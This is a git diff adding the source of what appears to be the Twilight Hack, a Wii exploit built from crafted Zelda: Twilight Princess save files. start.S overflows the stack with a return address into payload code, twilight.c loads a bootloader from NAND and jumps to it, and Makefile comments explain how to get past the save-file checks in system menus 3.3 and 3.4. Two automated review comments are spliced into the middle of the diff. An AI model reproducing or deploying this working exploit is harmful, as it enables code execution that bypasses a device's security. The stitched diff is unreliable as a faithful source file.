b/twilight/.gitignore @@ -0,0 +1,10 @@ +rzd?-?.?.bin +rzd?.data + +rzd??.elf +rzd??.slot + +title.bin + +zero16k +FAILURE diff --git a/twilight/Makefile b/twilight/Makefile new file mode 100644 index 0000000..315fd28 --- /dev/null +++ b/twilight/Makefile 
@@ -0,0 +1,148 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= broadway- + +# Where are the tools (http://git.infradead.org/users/segher/wii.git) +TOOLS ?= $(HOME)/wii/segher + +# End of configuration. + + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + + +# The compiler flags we need. + +CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + + +targets := rzde-3.2.bin rzde-3.3.bin rzde-3.4.bin +targets += rzdj-3.2.bin rzdj-3.3.bin rzdj-3.4.bin +targets += rzdp-3.2.bin rzdp-3.3.bin rzdp-3.4.bin +targets-short := rzde rzdj rzdp + +objs := twilight.o + +ppms := $(targets-short:%=%-icon.ppm) generic-banner.ppm +assets := title.bin $(ppms) + +loader := ../loader/loader.bin + + +titleid = $(shell perl titleid.pl $(1)) + + +# System menu 3.3 checks for the exploit, when a) you copy a save from SD, +# and b) when the menu starts up; but for a) it only looks at the first +# zeldaTp.dat file, and for b) it allows any file of non-aligned length. +# +# System menu 3.4 only looks at the last file in the wad when installing. +# +# System menu 4.0 finally avoids such silly bugs. 
+ +define twintig + D=$(call titleid,$(1)); \ + $(TOOLS)/twintig $$D $@ toc-$1 +endef + + +all: $(targets) + +$(filter %-3.2.bin,$(targets)): %-3.2.bin: %.data +$(filter %-3.3.bin,$(targets)): %-3.3.bin: %.data zero16k +$(filter %-3.4.bin,$(targets)): %-3.4.bin: %.data FAILURE +$(targets): %.bin: toc-% $(assets) + @echo " TWINTIG $@" + $(Q)$(call twintig,$*) + +saves := $(targets-short:%=%.data) + +rzde.data: rzde0.slot rzde2.slot +rzdp.data: rzdp0.slot +rzdj.data: rzdj0.slot +$(saves): $(loader) + @echo " ZELDAPACK $@" + $(Q)./pack.sh $@ $(filter %.slot,$^) + $(Q)$(TOOLS)/zelda-cksum $@ + $(Q)cat $(loader) >> $@ + $(Q)printf '\0' >> $@ + +slots := rzde0.slot rzde2.slot rzdj0.slot rzdp0.slot + +$(slots): %.slot: %.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +elfs := $(slots:.slot=.elf) + +rzde0.elf: baddr := 0x8046a3e0+0 +rzde2.elf: baddr := 0x804519e0+0x0a94 +rzdj0.elf: baddr := 0x8044f860+0 +rzdp0.elf: baddr := 0x804522e0+0 +$(elfs): %.elf: twilight.lds %.o $(objs) + @echo " LINK $@" + $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ + +exploit-objs := $(elfs:.elf=.o) + +$(exploit-objs): slot-name := Twilight Hack +rzde0.o: slot-name := TwilightHack0 +rzde2.o: slot-name := TwilightHack2 +$(exploit-objs): %.o: start.S head.b + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -D NAME="$(slot-name)" -c $< -o $@ + +%.o: %.c + @echo " COMPILE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +title.bin: ../.version + @echo " TITLEBIN $@" + $(Q)perl make-title-bin.pl > $@ + +../.version: FORCE + $(Q)$(MAKE) -C .. .version + +$(ppms): %.ppm: %.png + @echo " PPM $@" + $(Q)convert $< $@ + +zero16k: + $(Q)dd if=/dev/zero bs=16384 count=1 2>/dev/null > $@ + +FAILURE: + $(Q)echo FAILURE > $@ + +$(loader): FORCE + $(Q)$(MAKE) -C ../loader + +FORCE: + +clean: + -rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) + -rm -f title.bin zero16k FAILURE 
diff --git a/twilight/generic-banner.png b/twilight/generic-banner.png new file mode 100644 index 0000000..536d357 Binary files /dev/null and b/twilight/generic-banner.png differ diff --git a/twilight/generic-banner.ppm b/twilight/generic-banner.ppm new file mode 100644 index 0000000..7ed37aa Binary files /dev/null and b/twilight/generic-banner.ppm differ diff --git a/twilight/head.b b/twilight/head.b new file mode 100644 index 0000000..7241dfb Binary files /dev/null and b/twilight/head.b differ diff --git a/twilight/make-title-bin.pl b/twilight/make-title-bin.pl new file mode 100755 index 0000000..d252092 --- /dev/null +++ b/twilight/make-title-bin.pl @@ -0,0 +1,16 @@ +#!/usr/bin/perl +sub printline { + my $x = shift; + chomp $x; + $x .= "\0" x 32; + $x = substr $x, 0, 32; + $x =~ s/(.)/\0$1/g; + + print $x; +} + +$name = "Twilight Hack by Team Twiizers"; +$version = `cat ../.version`; + +printline $name; +printline $version; diff --git a/twilight/pack.sh b/twilight/pack.sh new file mode 100755 index 0000000..b1aa666 --- /dev/null +++ b/twilight/pack.sh @@ -0,0 +1,8 @@ +#!/bin/bash +out=$1; shift +dd if=/dev/zero bs=1 count=$((0x4000)) of=$out 2>/dev/null +start=0 +for save in $@; do + dd if=$save of=$out bs=1 seek=$start conv=notrunc 2>/dev/null + start=$((start+0xa94)) +done diff --git a/twilight/rzde-icon.png b/twilight/rzde-icon.png new file mode 100644 index 0000000..7e753c9 Binary files /dev/null and b/twilight/rzde-icon.png differ diff --git a/twilight/rzde-icon.ppm b/twilight/rzde-icon.ppm new file mode 100644 index 0000000..e695ee7 Binary files /dev/null and b/twilight/rzde-icon.ppm differ diff --git a/twilight/rzdj-icon.png b/twilight/rzdj-icon.png new file mode 100644 index 0000000..4f865f8 Binary files /dev/null and b/twilight/rzdj-icon.png differ diff --git a/twilight/rzdj-icon.ppm b/twilight/rzdj-icon.ppm new file mode 100644 index 0000000..94ce235 Binary files /dev/null and b/twilight/rzdj-icon.ppm differ 
diff --git a/twilight/rzdp-icon.png b/twilight/rzdp-icon.png new file mode 100644 index 0000000..d6f9263 Binary files /dev/null and b/twilight/rzdp-icon.png differ diff --git a/twilight/rzdp-icon.ppm b/twilight/rzdp-icon.ppm new file mode 100644 index 0000000..4088e74 Binary files /dev/null and b/twilight/rzdp-icon.ppm differ diff --git a/twilight/start.S b/twilight/start.S new file mode 100644 index 0000000..5d453aa --- /dev/null +++ b/twilight/start.S @@ -0,0 +1,35 @@ +// Copyright 2008-2009 Segher Boessenkool +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +#define XSTR(x) #x +#define ISTR(x) XSTR(x) + + .section .start,"ax" + + // Uninteresting stuff. + .incbin "head.b" + + // "Link". This is displayed on the load menu, so make it nice. +0: .ascii ISTR(NAME) + .fill 17 - (. - 0b) + + // "Epona". Hungry horse eats the stack. + .fill 0xe8,1,'3' + + // The return address on the stack. + .long start + + // Align things properly -- there's code after this. + .fill 7,1,'S' + .balign 4,0 + +start: + // Set up a stack frame. + lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) + + // Pass the address we are called from, to determine region. + mflr 3 + + // Go for it! + b main diff --git a/twilight/titleid.pl b/twilight/titleid.pl new file mode 100755 index 0000000..f735f1d --- /dev/null +++ b/twilight/titleid.pl @@ -0,0 +1,2 @@ +#!/usr/bin/perl +print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/twilight/toc-rzde-3.2 b/twilight/toc-rzde-3.2 new file mode 100644 index 0000000..07bf1a4 --- /dev/null +++ b/twilight/toc-rzde-3.2 @@ -0,0 +1,4 @@ +title.bin +generic-banner.ppm +rzde-icon.ppm +rzde.data zeldaTp.dat diff --git a/twilight/toc-rzde-3.3 b/twilight/toc-rzde-3.3 new file mode 100644 index 0000000..03d7fa5 --- /dev/null +++ b/twilight/toc-rzde-3.3 
@@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzde-icon.ppm +zero16k zeldaTp.dat +rzde.data zeldaTp.dat diff --git a/twilight/toc-rzde-3.4 b/twilight/toc-rzde-3.4 new file mode 100644 index 0000000..30c4035 --- /dev/null +++ b/twilight/toc-rzde-3.4 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzde-icon.ppm +rzde.data zeldaTp.dat +FAILURE FAILURE diff --git a/twilight/toc-rzdj-3.2 b/twilight/toc-rzdj-3.2 new file mode 100644 index 0000000..fdab09e --- /dev/null +++ b/twilight/toc-rzdj-3.2 @@ -0,0 +1,4 @@ +title.bin +generic-banner.ppm +rzdj-icon.ppm +rzdj.data zeldaTp.dat diff --git a/twilight/toc-rzdj-3.3 b/twilight/toc-rzdj-3.3 new file mode 100644 index 0000000..133d563 --- /dev/null +++ b/twilight/toc-rzdj-3.3 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdj-icon.ppm +zero16k zeldaTp.dat +rzdj.data zeldaTp.dat diff --git a/twilight/toc-rzdj-3.4 b/twilight/toc-rzdj-3.4 new file mode 100644 index 0000000..d32c4f8 --- /dev/null +++ b/twilight/toc-rzdj-3.4 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdj-icon.ppm +rzdj.data zeldaTp.dat +FAILURE FAILURE diff --git a/twilight/toc-rzdp-3.2 b/twilight/toc-rzdp-3.2 new file mode 100644 index 0000000..e58ce07 --- /dev/null +++ b/twilight/toc-rzdp-3.2 @@ -0,0 +1,4 @@ +title.bin +generic-banner.ppm +rzdp-icon.ppm +rzdp.data zeldaTp.dat diff --git a/twilight/toc-rzdp-3.3 b/twilight/toc-rzdp-3.3 new file mode 100644 index 0000000..bbdb572 --- /dev/null +++ b/twilight/toc-rzdp-3.3 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdp-icon.ppm +zero16k zeldaTp.dat +rzdp.data zeldaTp.dat diff --git a/twilight/toc-rzdp-3.4 b/twilight/toc-rzdp-3.4 new file mode 100644 index 0000000..e642bf4 --- /dev/null +++ b/twilight/toc-rzdp-3.4 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdp-icon.ppm +rzdp.data zeldaTp.dat +FAILURE FAILURE diff --git a/twilight/twilight.c b/twilight/twilight.c new file mode 100644 index 0000000..9ce9a2b --- /dev/null +++ b/twilight/twilight.c 
@@ -0,0 +1,222 @@
+// Copyright 2008-2009 Segher Boessenkool
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+#undef DEBUG_GECKO
+#undef DEBUG_BLINK
+
+typedef unsigned int u32;
+typedef unsigned char u8;
+
+int nand_open_E0(const char *path, void *buf, u32 mode);
+int nand_open_E2(const char *path, void *buf, u32 mode);
+int nand_open_J0(const char *path, void *buf, u32 mode);
+int nand_open_P0(const char *path, void *buf, u32 mode);
+
+int nand_read_E0(void *buf, void *dest, u32 len);
+int nand_read_E2(void *buf, void *dest, u32 len);
+int nand_read_J0(void *buf, void *dest, u32 len);
+int nand_read_P0(void *buf, void *dest, u32 len);
+
+void audio_stop_E0(void);
+void audio_stop_E2(void);
+void audio_stop_J0(void);
+void audio_stop_P0(void);
+
+void graphics_stop_E0(void);
+void graphics_stop_E2(void);
+void graphics_stop_J0(void);
+void graphics_stop_P0(void);
+
+static u8 nand_buf[0x100] __attribute__ ((aligned(0x40)));
+
+#ifdef DEBUG_GECKO
+void gecko_print(void *, const char *);
+
+#define PRINT(x) gecko_print(0, x)
+#define HEX(x) hex(x)
+
+static void hex(u32 x)
+{
+ u32 i;
+ u32 digit;
+ char s[10];
+
+ for (i = 0; i < 8; i++) {
+ digit = x >> 28;
+ x <<= 4;
+ s[i] = digit + '0' + (digit < 10 ? 0 : 'a' - 10 - '0');
+ }
+ s[8] = '\n';
+ s[9] = 0;
+ PRINT(s);
+}
+#else
+#define PRINT(x) do { } while (0)
+#define HEX(x) do { } while (0)
+#endif
+
+static void sync_cache(void *p, u32 n)
+{
+ u32 start, end;
+
+ start = (u32)p & ~31;
+ end = ((u32)p + n + 31) & ~31;
+ n = (end - start) >> 5;
+
+ while (n--) {
+ asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p));
+ p += 32;
+ }
+ asm("sync ; isync");
+}
+
+static void sync_before_read(void *p, u32 n)
+{
+ u32 start, end;
+
+ start = (u32)p & ~31;
+ end = ((u32)p + n + 31) & ~31;
+ n = (end - start) >> 5;
+
+ while (n--) {
+ asm("dcbf 0,%0" : : "b"(p));
+ p += 32;
+ }
+ asm("sync");
+}
+
+static void jump(void *p, u32 arg)
+{
+ PRINT("taking the plunge...\n");
+
+ asm("mr 3,%1 ; mtctr %0 ; bctrl" : : "r"(p), "r"(arg) : "r3");
+
+ PRINT("whoops, payload returned to us\n");
+}
+
+#ifdef DEBUG_BLINK
+static u32 read32(u32 addr)
+{
+ u32 x;
+
+ asm volatile("lwz %0,0(%1) ; sync" : "=r"(x) : "b"(0xc0000000 | addr));
+
+ return x;
+}
+
+static void write32(u32 addr, u32 x)
+{
+ asm("stw %0,0(%1) ; eieio" : : "r"(x), "b"(0xc0000000 | addr));
+}
+
+static void blink(u32 colour)
+{
+ u32 *fb = (u32 *)0xC0F00000;
+ u32 i;
+
+ // blink tray led
+ write32(0x0d8000c0, read32(0x0d8000c0) ^ 0x20);
+
+ for (i = 0; i < 640*576/2; i++)
+ fb[i] = colour;
+}
+#else
+#define blink(x) do { } while(0)
+#endif
+
+void __attribute__ ((noreturn)) main(u32 baddr)
+{
+ int ret, i, len;
+ char *area;
+ char *gameid = (char *)0x80000000;
+ int (*nand_open)(const char *path, void *buf, u32 mode);
+ int (*nand_read)(void *buf, void *dest, u32 len);
+ void (*audio_stop)(void);
+ void (*graphics_stop)(void);
+
+ PRINT("Hello, Brave New World!\n");
+
+ baddr -= 0x2c0;
+
+ switch (gameid[3]) {
+ case 'E':
+ if ((baddr>>16) == 0x8045) {
+ nand_open = nand_open_E2;
+ nand_read = nand_read_E2;
+ audio_stop = audio_stop_E2;
+ graphics_stop = graphics_stop_E2;
+ } else {
+ nand_open = nand_open_E0;
+ nand_read = nand_read_E0;
+ audio_stop = audio_stop_E0;
+ graphics_stop = graphics_stop_E0;
+ }
+ break;
+ case 'P':
+ nand_open = nand_open_P0;
+ nand_read = nand_read_P0;
+ audio_stop = audio_stop_P0;
+ graphics_stop = graphics_stop_P0;
+ break;
+ case 'J':
+ nand_open = nand_open_J0;
+ nand_read = nand_read_J0;
+ audio_stop = audio_stop_J0;
+ graphics_stop = graphics_stop_J0;
+ break;
+ default:
+ PRINT("unsupported game region\n");
+ for (;;)
+ ;
+ }
+
+ audio_stop();
+ graphics_stop();
+
+ blink(0x266a26c0); // maroon
+
+ ret = nand_open("zeldaTp.dat", nand_buf, 1);
+
+ blink(0x7140718a); // olive
+
+ PRINT("nand open --> ");
+ HEX(ret);
+
+ area = (void *)0x90000020;
+
+ // Skip past save game, to loader.bin
+ ret = nand_read(nand_buf, area, 0x4000);
+
+ len = 0;
+ for (i = 0; i < 0x40; i++) {
+ PRINT("reading bootloader page: ");
+ HEX(i);
+
+ blink(0x40804080 + i*0x02000200); // grey
+
+ sync_before_read(area + 0x1000*i, 0x1000);
+ ret = nand_read(nand_buf, area + 0x1000*i, 0x1000);
+ len += ret;
+
+ blink(0x552b5515 + i*0x02000200); // lime
+
+ PRINT("--> ");
+ HEX(ret);
+ PRINT("\n");
+ }
+
+ for (i = 0; i < 0x100; i++)
+ HEX(((u32 *)area)[i]);
+
+ blink(0xc399c36a); // sky blue
+
+ sync_cache(area, len);
+ jump(area, 0x123);
+
+ blink(0x4c544cff); // red
+
+ PRINT("(shouldn't happen)\n");
+ for (;;)
+ ;
+}
diff --git a/twilight/twilight.lds b/twilight/twilight.lds
new file mode 100644
index 0000000..a871cdc
--- /dev/null
+++ b/twilight/twilight.lds
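Review bot: In `sync_cache` and `sync_before_read` the line-aligned `start` is computed but the loop then walks from the unaligned `p`, so each `dcbst`/`dcbf` hits the intended line only because `p - start` is below 32; setting `p = (void *)start;` once `n` is known states that intent directly, and `p += 32` on a `void *` is a GCC extension that deserves either a `char *` cast or a comment. In `main`, `len` is an `int` that accumulates whatever `nand_read` returns, and that sum is handed to `sync_cache` as a `u32`; a comment on the `len += ret;` line should state the assumption that `nand_read` returns a non-negative byte count, since nothing here checks it. The constants `0x2c0`, `0x8045`, `0x90000020`, the `nand_open` mode `1` and the `jump` argument `0x123` have no comment saying what they denote, so a one-line note on each would spare the next reader from guessing.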
@@ -0,0 +1,40 @@
+/* Copyright 2008-2009 Segher Boessenkool
+ This code is licensed to you under the terms of the GNU GPL, version 2;
+ see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+ gecko_print = 0x802facf0;
+
+ nand_open_E0 = 0x80371f50;
+ nand_read_E0 = 0x80371710;
+ audio_stop_E0 = 0x8034607c;
+ graphics_stop_E0 = 0x8035c930;
+
+ nand_open_E2 = 0x8035c988;
+ nand_read_E2 = 0x8035c148;
+ audio_stop_E2 = 0x80330a4c;
+ graphics_stop_E2 = 0x80347368;
+
+ nand_open_P0 = 0x8035cdb8;
+ nand_read_P0 = 0x8035c578;
+ audio_stop_P0 = 0x80330e7c;
+ graphics_stop_P0 = 0x80347798;
+
+ nand_open_J0 = 0x8035e440;
+ nand_read_J0 = 0x8035dc00;
+ audio_stop_J0 = 0x8033256c;
+ graphics_stop_J0 = 0x80348e20;
+
+ .twilight baddr :
+ {
+ rzd*.o(.start)
+ *(.text)
+ *(.rodata .rodata.*)
+ *(.data)
+ *(.bss)
+ . = 0x0a94;
+ }
+}
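Review bot: The four blocks of absolute symbol addresses (`_E0`, `_E2`, `_P0`, `_J0`) carry no comment saying what each suffix denotes or how the values were obtained, so a reader cannot tell which block needs revisiting when one of them is wrong; the letter appears to match the region byte that `twilight.c` switches on and the digit presumably a revision, which is exactly what a header comment such as `/* suffix: <region letter as tested in twilight.c><revision> -- confirm */` should pin down. The trailing `. = 0x0a94;` pads the section to a fixed size without stating what that size must agree with, and `rzd*.o(.start)` relies on the object-name prefix to place the entry code first; a one-line comment on each would make both constraints explicit.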